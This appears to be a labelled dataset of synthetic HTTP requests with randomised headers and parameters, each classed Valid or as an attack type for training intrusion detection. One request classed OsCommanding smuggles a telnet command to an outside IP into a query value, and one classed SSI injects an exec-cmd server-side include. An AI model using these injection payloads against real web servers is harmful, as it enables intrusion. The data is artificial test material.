GET /darreN/ahoLRG96JTcFGzjG0SZ1/betweensock_streamlsgp.nsf?msLyuoo=%5Ca&1replacebiid=inh2%7C&fvaegecneo=627422&a8t1ardaroHv=3UmitnEsgltruAlaf&bestzzietdwhPad=t8nv&ebuz=tert&i3=istPe7ieghtysr%5C&tkieb=eeaenoRTu+r8%7Eaps&1frtdhs7Rcshs=1751657&ei=o9tteutEs%3C8e&hh3kEk3=e+iframe&lO8mddht=ne HTTP/1.1
Host: 128.145.22.200
Connection: Tee1k
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jedpt-wacnnymm;q=0.6, oIo-mqnshta, trrert-nle, saEiu-F;q=0.4
Cache-Control: n='rjtt'
Client-ip: 50.4.66.81
Cookie: 7vZrTiaaeac=as3km;a5iuu6CWnflRtn=360942
Cookie2: $Version="5"
Date: Sun, 01 Jun 08 12:20:45 GMT
ETag: "oKxKJqZqUr8EJj6KE"
Expect: 100-continue
From: aclt@ntyaoohns.cz
If-Modified-Since: Fri, 08 Dec 06 17:32:26 GMT
If-Unmodified-Since: Thu, 02 Apr 09 24:20:43 GMT
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: *
Max-Forwards: 13
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: Basic bmEwMTc6WGNublNu
Range: -14621,-370256
Referer: http://www.iehe.fr/oe2oint/nrtrn/EitereeY/hloeyoEb.tar.gz
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (compatible; Konqueror/6.2; Mac OS X; C2sN8hao; 2sealt)
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0093x2454
Via: 8.1 www.oTtio.tiff
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27935
Start - Id: 15707
class: Valid
GET /1m8@0GlQ1/narct88ldloy/ardtiNa5t0nufIo/huFjwqmxn/nsmbIDHkN/co5srHVgL8aneioeee/rnrAiR1sChwjc1r/exj/t2ia8udeFgd.mdb? HTTP/1.0
Host: 7.198.203.182
Connection: ooi5e
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 136.105.214.240
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="81"
Date: Wed, 22 Jul 09 14:04:31 UTC
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 06 Feb 10 07:45:57 GMT
If-Unmodified-Since: Mon, 31 Dec 07 10:30:04 CET
If-Match: "aL-M36byck8VJfx.kLwe"
If-None-Match: "79tYyoyJ1Zp1QC8OiGw9"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: NTLM OUU2MW91TmVjd2V0dHN5bnJzdGhvaHJobmltcGlycnp1
Range: -2
Referer: http://www.ojstj.net/oeclySs.pl
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: wakO2Mou http://www.ogwa.biz
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/3.4 249.83.18.65
Transfer-Encoding: oEEkus
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 932 www.rnd3y6t.html "sooEn8itisTrOtziidm" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 9307845835407773
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15707
Start - Id: 7005
class: Valid
POST /cmd-ItiwinntopenSBHDorecho/mwgwy0rp2vehteuyt/UT4/mSBb/esothtgtludsn6nigch/bodyYTq.eopen1/dki9CGafPFga39EYhaB/erAk.mdb? HTTP/1.0
Content-Length: 177
Content-Language: sdE,so4tg,uph
Content-Encoding: deflate
Content-Location: http://www.qetlaf.cz/isarelm.asp
Content-MD5: YWdlWWVvbHRFcnJnZm93Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Sep 08 18:53:54 GMT
Last-Modified: Tue, 14 Mar 06 13:33:58 CET
Host: www.jst9h.gov
Connection: close
Accept: image/png
Accept-Charset: iso-8859-8;q=0.4, euc-kr;q=0.3, windows-874;q=0.3, hz-gb-2312;q=0.0, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 226.93.8.242
Cookie: NhuuhieokOIani=921011
Cookie2: $Version="107"
Date: Thu, 09 Jun 05 16:30:59 GMT
ETag: "gtYLM69@ESq5hletHiZ"
Expect: Eadococ=aebcr
From: wywe@Otr8e.st
If-Modified-Since: Fri, 07 May 04 03:42:30 UTC
If-Unmodified-Since: Thu, 21 Aug 08 07:30:02 GMT
If-Match: "DvSM62z-yMAHpo_QQ"
If-None-Match: "__uyCfo0j7d4c-AbMpmS"
If-Range: Sun, 24 Dec 06 20:07:11 UTC
Max-Forwards: 893
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: t7j1 Zdjmr=eaufl
Range: 5-,-737
Referer: /psizl7f/tznsneeo/rArfquha/zna1ep.sh
TE: deflate;q=0.0
Trailer: From
User-Agent: uoet55ubtm (585ghzIK; oJTlshFOj; sbL_XA_..G; aOh6aaql)
UA-CPU: 68000
UA-Disp: 065,120,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 443x583
Via: 7.8 www.rsEnloga.js, s3f2t/5.1 www.1trR.gif, FTP/4.3 www.Moue.htm:826
Transfer-Encoding: ioxgir
Upgrade: oenhl/2.3, epd/0.7
Warning: 374 www.tkml.tiff "icerh9dims7dhi2molt" 
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tSnqasj=447&iiHewmy8=aK80NQgs&td2cbeTuelayw=ts tba&wehi=jse&ov=txtcleelEeff&ilzesn=Kah8o&da7tsd7Tbhsew=gtEHsEowstnIetrtEo&it9tRthotepR4c=OOe3ht1w84&crfrnhs=Ooeczsoo&wscetat=2QcK

End - Id: 7005
Start - Id: 43439
class: OsCommanding
GET /htacces_Z.css?bnt=nfau9o1Fv&sw=28791977&ols10o=aId%28mrdl7&tcioygb7ar=rinakt8e0tnwil&TAMwhCxp_3GBKV=ee&clE=roefe+dhttps2&ju=koW9&tUytTWrw5i=ttstasbaaa&tlnToatnfarrw=tK25.&eO=%22%3Btelnet++++124.249.241.63+++++80%3B HTTP/1.0
Host: www.wtchdn.com:80
Connection: wo8r
Accept: audio/x-wav;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: 14cwol=r
Client-ip: 43.84.88.74
Cookie: ewn=we;26edjmS=57692;ur8neiaeiodtzw=rformhg 8lebt9aiym
Cookie2: $Version="4"
Date: Fri, 23 Apr 04 17:19:42 UTC
ETag: W/"s9u-oZzMeEZFqxQxDc3j"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Wed, 01 Mar 06 01:15:36 CET
If-Match: *
If-None-Match: "bLyposXZ74BS7lpBB"
If-Range: Tue, 12 Jan 10 21:20:43 CET
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: yst='tDroi'
Proxy-Authorization: Basic b3pzbndsbzptaWg5cW9k
Authorization: Basic c0c1UnBXOmdkaWI=
Range: 89-,6-,2-
Referer: http://noS7r.de/9hnl/aJmtTeim/msLi/9ut4sacn.js
TE: chunked,deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 2.0; ss-de; rv:7.6.9) Gecko/13236281
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: FTP/3.3 61.141.171.215
Transfer-Encoding: gzip
Upgrade: nb0Mi/9.5, daegas/8.7, tiso/6.9, rtN/5.7
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43439
Start - Id: 16080
class: Valid
GET /ath8/iehcad4yislbonvot/thqq@6Mqy/o7r67huou9/lyLEU9B-fUy8/tdRj38-yI2lfkLkAw.Jv/t1TaBud.FLwaXkR/tzw8th6h8rol/yaeEtwHr0i3ceceK/d_xCzTS7/IiD4/ejsinnlLblidixfauai.php3?emkiwcdxnFaLeh=saQlf&pULA8gXpasswds=537567&HLehgea=n+srpcn%3A%2Fhexecaot%5D&ihcf=bn8pu+%3ENshutdownaq&hi=270&eoCtgcia8irte=47610&erailgi=eacyaccess_logrnsihevbscriptqtqte&TED=492&deaaoitaeoce=smaqLdtet7NeTYa&Eo=9ispeur%3Aasystemu4rgo&0adzlaneTchxd=5&rcil3eohi=t7jd&n4=sznNkq.E35QK&owthr4e=1366 HTTP/1.1
Host: www.7sjgo.ch:80
Connection: sahir
Accept: */*;q=0.1
Accept-Charset: windows-1251;q=0.7, big5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: m='7eg0stev'
Client-ip: 46.71.143.53
Cookie: cAejTsetn=%ucnate0aebe;IMEnAW4TRllQ=nTqvWeXl
Cookie2: $Version="78"
Date: Wed, 20 Jan 10 04:44:20 UTC
ETag: W/"emX59h9jmNVMMgNH"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 30 Jul 09 16:22:09 GMT
If-Unmodified-Since: Sun, 21 Oct 07 19:03:38 GMT
If-Match: "JINeOL12m01uklIXAw"
If-None-Match: *
If-Range: Fri, 17 Jun 05 19:11:39 GMT
Max-Forwards: 3
MIME-Version: 5.7
Pragma: p=oOSNa
Proxy-Authorization: Digest cnonce="Sas09gl4"
Authorization: esp9po 9o4fh=ttpe
Range: 303812-992,8-0,-1
Referer: http://www.opdihsth.org/slroetT.msf
TE: trailers,chunked;q=0.1,gzip
Trailer: Via
User-Agent: q.wrK550 http://www.zehbyna.de
UA-CPU: x86
UA-Disp: 489,939,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 892x2376
Via: 9.8 www.h7sdzd0.gif
Transfer-Encoding: compress
Upgrade: ttes/4.5, uils/1.8
Warning: 947 237.230.136.104 "emhixriherlerH7tA" "Fri, 12 Jan 07 18:24:13 UTC"
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16080
Start - Id: 20347
class: Valid
GET /eR71AU4ZtpYANCqzjsnq/ehT1zeH1Ewindow.openSu7y/tnLst8ua7O/nysbesnbotk8ijaaT/jhmao/9MfbpgE@ytjEW/0-TpV0A.7HLvFtmp.shtml?Sdfqn=efwdseg8ch&dnn3nwtv=1085&WiewTdgaaSmntli=ceYxiframeu8thro%3BincludecruA%24uh&eU5dnoag85e=nDh&FSa4=tmpaNe+r6&HAeSkK@dADNg=kndtsyrbet&leQekfgeE0=eCeboot.inilinkc&0ECJ=n3UhsdSrniovaaR&ldS5soIoslnlll=o&eid4sveEefnagna=oxn91&i7nTea=puvarHK&gr=Ibc%3A%3Boy%2Flbelr HTTP/1.0
Host: 76.81.95.144
Connection: nhba
Accept: image/*, video/quicktime;q=0.2, text/*
Accept-Charset: iso-8859-2;q=0.7, hz-gb-2312, x-mac-roman;q=0.3
Accept-Encoding: identity
Accept-Language: pene-t;q=0.9, igouusea-td;q=0.4
Cache-Control: max-age=254
Client-ip: 229.169.85.124
Cookie: doTneie=rEeRxetae;DEihv=jwboot.ini;winntWhicmdz=2et2nLisqc9tne;lseRovntectk=rlgIne
Cookie2: $Version="36"
Date: Mon, 08 May 06 01:52:21 GMT
ETag: "hAQF3BPQemyzgwrn"
Expect: gdoiamee=mronoeHg
From: lltjost@rpit7E.ch
If-Modified-Since: Wed, 09 Jun 04 22:04:59 GMT
If-Unmodified-Since: Thu, 01 May 08 17:35:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6852
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM Y2ltbGtkZmVlaW5qYXRhYWlkZW9haDVvaXNsdGR3bHFMYnQ3
Authorization: NTLM cE5hbGNOYWlveUFobm5pNmhzZnVhVHNpb3NhY24ycHJNYWF0QmF0bmFkaA==
Range: -6349,-64
Referer: /hth2/8bEpe/hoxoii2p.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 0.8; e9-ni; rv:7.8.1) Gecko/20158591
UA-CPU: PowerPC
UA-Disp: 945,093,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 056x355
Via: 9.9 9.93.78.155, atteg/1.2 www.pqigt.htm
Transfer-Encoding: gzip
Upgrade: sqiew/4.1, 1n55Nn/3.3, aeif/5.3, csk/5.8
Warning: 057 70.165.110.68 "j8hte" 
X-Forwarded-For: 11.244.14.65
X-Serial-Number: 11331311370992169456
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20347
Start - Id: 34042
class: Valid
POST /ib3layens6wea9ejqD.pl? HTTP/1.1
Content-Length: 275
Content-Language: le,wriia,ngbtpzt
Content-Encoding: identity
Content-Location: http://0Deu9eud.cz/te6zIt/eecptfS/raoa3n.css
Content-MD5: MXE4OGVvaWFvcmFhM2F3aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 May 05 06:49:57 UTC
Last-Modified: Sat, 15 Aug 09 14:58:58 CET
Host: www.oxnO.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 81.120.65.212
Cookie: eo6sxoodeea=2208;kh5i6oy3atwa=gandGdcatsadtmp$+p;izawGd=4gslltertUattiw;tfqwp=yxAwP
Cookie2: $Version="329"
Date: Mon, 25 Jan 10 04:50:48 GMT
ETag: "KHckGgMH_7fBEa2n"
Expect: urgclmR=tame3ii;etsbwiO=d770ef
From: nfaArT@c8eeenfHb.org
If-Modified-Since: Sat, 19 Dec 09 19:10:48 UTC
If-Unmodified-Since: Thu, 18 Mar 04 15:52:36 CET
If-Match: "1sNiiTrvw.6gXO0yKUn"
If-None-Match: *
If-Range: Tue, 16 Jan 07 10:23:03 GMT
Max-Forwards: 625
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM c2JucExDaWVpQXNscnNudGVlc25hblRzdHJnb2FnbG5vM2l0aXV5ZmR3emliMnJl
Range: -72
Referer: http://www.wtes.fr/isr6/PbOeaA/oobW3m.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.3 (compatible; 3anrw3ni; Open BSD i586; pcsern; aeiUm)
UA-CPU: Sparc
UA-Disp: 027,841,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: 8.6 123.110.182.150:3206
Transfer-Encoding: compress
Upgrade: eheps/1.6, k8an/6.2, gmti/1.1, Il76oa/5.8
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 14296843524
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wr=5pc773F8ohnullth6&aconnect@.RlocationPC= @location2tn;n8o&jtee3o7atvs=690851&oajveer=33&atulgma=s 1ei3seSl&evalTguzaCe@j2d=splneugto&1iaoraosVaysarv=to5n2hncuAEL&njoexhe=sah&bYr7rcf2tetl=9112473&7eNrcptZ=755503558&jDdh=07864&wp-G0Vk22perl@Fg=Ehlanme x/gwindow.opena 

End - Id: 34042
Start - Id: 33152
class: Valid
PUT /AxsnA4onxe/tsoyisc/_SYZw/AgipmnEIhwseiowlRAps/tWXzKA7y/oehRc7uowot8n/sbtiibysyyoer/wytAMy8.lByD0mFPxv/rteowey.jpeg? HTTP/1.0
Content-Length: 169
Content-Language: Cood,E7
Content-Encoding: gzip
Content-Location: /loAee/t3tmn/rutknsv.wav
Content-MD5: bmVucHdYZWN1bGl1b3R1eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 06:36:25 GMT
Last-Modified: Mon, 16 Jun 08 19:24:02 GMT
Host: www.ngwl4.org:80
Connection: close
Accept: application/zip, text/*;q=0.1
Accept-Charset: windows-874;q=0.2, cp-936
Accept-Encoding: *;q=0.8
Accept-Language: T-rye, ncehu-MTz
Cache-Control: max-stale
Client-ip: 212.156.70.240
Cookie: KDxD5QQItmpmna=08949;gxtgno=y\c
Cookie2: $Version="14"
Date: Sun, 16 Mar 08 24:24:04 GMT
ETag: "vYqCg6krYQGgc4Tws38"
Expect: 100-continue
From: Eeho@ohodxite.cz
If-Modified-Since: Sat, 25 Sep 04 24:30:25 GMT
If-Unmodified-Since: Tue, 16 Dec 08 02:23:22 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Nov 08 24:26:45 UTC
Max-Forwards: 0611
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic MWxlbTpkdm9T
Authorization: ea2omu teZoSENi=rizrc
Range: 2283-08,769-296466,942-
Referer: http://www.asnteta.it/itas/sTtegltF/nrnt/ltri/rina.bin
TE: chunked,trailers,chunked;q=0.0
Trailer: Authorization
User-Agent: ynseeTE (sPgyKs)
UA-CPU: x86
UA-Disp: 460,8217,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: HTTP/2.0 www.heesve.css, HTTP/2.9 33.173.224.51
Transfer-Encoding: deflate
Upgrade: lrh/0.7, ai4/1.8, kcj2NT/4.6
Warning: 563 www.ssegmi.jpg:0959 "eA0hiutfptspi" 
X-Forwarded-For: 45.36.94.83
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

si7oeN3htsa=e tUtrrhBce&E4yXinsertY= ~ho&iDhhaerdebhsngs=jer&@w9AmLU=ke o4tm4 &rnesto=4609899&6fei8asixtnc9=unnRoh&cPN5-ug=mih&tktnEemi=n6i&Qtbim5=si zsrl lp4h eas1eni

End - Id: 33152
Start - Id: 26883
class: Valid
GET /homeT/rh4Yl3I3b.PC-77z_/saVMm09j/pnvoa2ioer8w5nlwosp/mie50toj/nodeENUxZ/xvqS1Z0eYh9IIR/e0XaSPqNEWg/ei/rce4iisn7dw4cAuaTy.php3? HTTP/1.1
Host: www.aAtahacrzg.st
Connection: tudijfh8
Accept: application/*
Accept-Charset: iso-8859-2;q=0.0, hz-gb-2312;q=0.0, us-ascii, big5;q=0.9, iso-8859-7;q=0.9
Accept-Encoding: *
Accept-Language: v0-ev;q=0.2, ushnPd-f2Koa;q=0.3
Cache-Control: no-cache
Client-ip: 42.185.253.58
Cookie: ocoert0Ide=wgete7;reH=eqVN;elT5Suetrg1=oW5
Cookie2: $Version="22"
Date: Wed, 23 Dec 09 23:53:35 GMT
ETag: "IAtnXv67SoAZSEy5b_z"
Expect: 100-continue
From: eiono0oj@eao5ewsoBo.fr
If-Modified-Since: Fri, 17 Feb 06 24:00:20 CET
If-Unmodified-Since: Tue, 03 Jul 07 17:48:21 CET
If-Match: *
If-None-Match: "7Sr@A0w3TUXYoUF"
If-Range: Tue, 26 Jan 10 22:30:22 UTC
Max-Forwards: 61
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: t9Sr auSjgil=OercP8j
Range: 70837-,02-
Referer: http://todctfiS.fr/dmi1ah/nebNywl.swf
TE: gzip;q=0.3,trailers,trailers
Trailer: From
User-Agent: inuer6ihreowRhk
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9814x1840
Via: 8.9 www.Ne3zyc.shtml, nas/7.8 www.imnf8.jpeg
Transfer-Encoding: gzip
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 297 www.mw6loneh.png "otAjosweset" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 62154
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26883
Start - Id: 22593
class: Valid
GET /Gk/ehe.js?epO=R%40group+byaccess_log%29yle&ar5n=wucmdxoy-&v7Do=10&atmpsr@lpWXadmin6=lt%251nCBcrHeawn&72=9&ellcise7ifuumte=-eUinserts0dfc&aapnq3peg3a7i=rsU&roliqastavhnaR=5&eo=h25T7r&se6=ivrho&ihorsoeiAerlist=stylelEoyz%7C6a&lstsaan=3823&odozdDf=85194295&au=e HTTP/1.0
Host: 81.127.178.30
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-950;q=0.5, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: hvTirxN8-ifehDe;q=0.8, e2e-l, s4it-ieeoDn, d-ohdsee;q=0.8, oxsbta8-Hyevaa;q=0.8
Cache-Control: max-age=0426
Client-ip: 226.179.232.156
Cookie: im37nTalbr5rf9=|toeen2W8wr;telnetzidHs=8126
Cookie2: $Version="291"
Date: Wed, 13 Feb 08 09:04:36 CET
ETag: W/"U5triMCzA1VMbPUS"
Expect: eeo8gl
From: tamegP8@NaDasMP.be
If-Modified-Since: Thu, 20 Mar 08 06:51:31 CET
If-Unmodified-Since: Sat, 16 Jun 07 21:51:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 902
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://28yon.org/iij6lh/pkbw3gd/AoND/aehai/s4tirli.gif
Authorization: Digest realm
Range: 4696-5,-34840
Referer: http://dadmhbYe.de/t0rez/apUntsi/hjro/uto7n6ty/eouw.cgi
TE: trailers,chunked;q=0.6,chunked
Trailer: Expect
User-Agent: sselrl2to (2t_E4u; qA32MYb8; rGWZ54CwG; axPU8I0mM)
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6216x6265
Via: 8.4 78.50.39.217, etby/2.6 www.cdedrGb.gif, HTTP/6.8 140.145.228.143
Transfer-Encoding: mmeyiH; mekliyFe=U0eufns
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 5.120.156.102
X-Serial-Number: 8769415
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22593
Start - Id: 8427
class: Valid
GET /fartl/4rntdgeebRtee2aws/cZKu/74GIf10Qihttpz0/eo9hns7.js?@MAQzXG=o8k9gkQwrJ&XtnesrceuitH=E%25Detc1&ttTjstekuo=retoe1w3qe4+&N7ySH3lsock_stream=Awiaxeshutdowncej HTTP/1.1
Host: www.issmoh.net:35660
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-3;q=0.5, x-mac-japanese;q=0.4, cp-950;q=0.6
Accept-Encoding: 
Accept-Language: s-nu;q=0.2, simetmls-t4rA;q=0.5
Cache-Control: only-if-cached
Client-ip: 12.195.5.63
Cookie: cMGMP=9238776;snlk=dS5xe
Cookie2: $Version="2"
Date: Tue, 05 Sep 06 04:34:32 CET
ETag: W/"d.sDMhz6vpM6HMSqcV"
Expect: NhosUte=fshRoh6e;snrot4
From: 8r0d@bdoa.cz
If-Modified-Since: Wed, 19 Oct 05 24:53:02 GMT
If-Unmodified-Since: Thu, 27 Mar 08 19:47:06 GMT
If-Match: "7f4p-IUWy2eQmjNv"
If-None-Match: "Tz_tF8CuJ_-3uT0w"
If-Range: *
Max-Forwards: 21
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest uri=http://xiaeia.gov/enhdtrl/gbbnahb.html
Authorization: Digest uri=http://manmtesr.de/3surs/enhdat.cfm
Range: 859-,4209-514,8-55532
Referer: http://sopiihrt.org/1oas.sh
TE: deflate,trailers
Trailer: If-Match
User-Agent: tetaim6i4EFi2emdgb
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3083x039
Via: ieawh/3.9 144.157.4.40
Transfer-Encoding: compress
Upgrade: iese/0.1, ulon/0.0, aerbl/9.9, nhsrT/4.2, etot/0.4
Warning: 357 99.135.65.27 "td6odiagrnr7lillcex" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8427
Start - Id: 39979
class: SSI
GET /_homeXo0a/6sEh/pR/0MXTlyj/dH88uD1-Ve8ZMUH/cpretii6Etesoer7siin/t2xzKVHm4FrpDlZ@p-G.tiff?texGeqhetb=onstudan7e&btip=wstieo&wotstlnov=9490&sys=x9nj&ihhdteksOeqyr=n7ausr&B.0rMgTsin=hcK0Lg&pufnsh=99&nOcdoEkvcqq=TtahavdaRld5f&xoAuEiegasA=1l%26t&rosucStciufabgc=nuzRfc5%3Cde&nTi=%3C%21++%23%3C%21--+++%23exec+++cmd%3D%22id%22--%3E&6cearnktiz=8451281887&q7boot.inimx78position@KXh=8703&ar=dBMbB%40%40G0&ohta4rAehn=4onsCK HTTP/1.0
Host: www.tis0edo.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.7, iso-8859-6
Accept-Encoding: deflate;q=0.0, deflate;q=0.4, gzip, deflate, identity
Accept-Language: Hne-Emp
Cache-Control: ifr='e'
Client-ip: 82.49.151.0
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="35"
Date: Tue, 29 Dec 09 02:10:43 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: hmiSezi@the9ciIr.cz
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: *
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 08
MIME-Version: 7.9
Pragma: 0e='tM'
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Digest response="D6B4C4E88F99caAC3C05Ba6cDa898f9A"
Range: -038647,3950-886928
Referer: http://in3dseyu.org/ltoiq/tPe0iuo.js
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 3.2; hx-en; rv:5.2.4) Gecko/51985058
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39979
Start - Id: 10995
class: Valid
GET /ePjj7qU/hb-aaGA3NLobv._NX/-PS_adminArZvFG/s8s.dll?ottsg=f-rdocumentt&orhelMleesc7=oeexecscript HTTP/1.0
Host: www.206a.com
Connection: keep-alive
Accept: text/xml, audio/basic, audio/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: io-ie6gpec, 0drnDEna-o;q=0.4
Cache-Control: only-if-cached
Client-ip: 160.197.226.194
Cookie: nb=tuupdate;YtTtdeu4Sea=758849
Cookie2: $Version="940"
Date: Sun, 10 Sep 06 13:43:10 CET
ETag: W/".m3CZgLSzXAn1PocvZF7"
Expect: kas1wl
From: Oimrip@itut.fr
If-Modified-Since: Thu, 28 May 09 09:56:18 GMT
If-Unmodified-Since: Mon, 25 Jun 07 23:42:06 CET
If-Match: *
If-None-Match: "@DCC8JyZLXna2Ei"
If-Range: Wed, 21 Oct 09 14:16:16 UTC
Max-Forwards: 977
MIME-Version: 2.3
Pragma: Intn=ow
Proxy-Authorization: Digest qop=kimet5
Authorization: neffl xtwMh=thio0
Range: 415535-51
Referer: http://www.smyeeshu.st/eueqeds.wav
TE: trailers,trailers,gzip;q=0.2
Trailer: Date
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 7.5; rt-dt; rv:2.9.5) Gecko/83133763
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 124x705
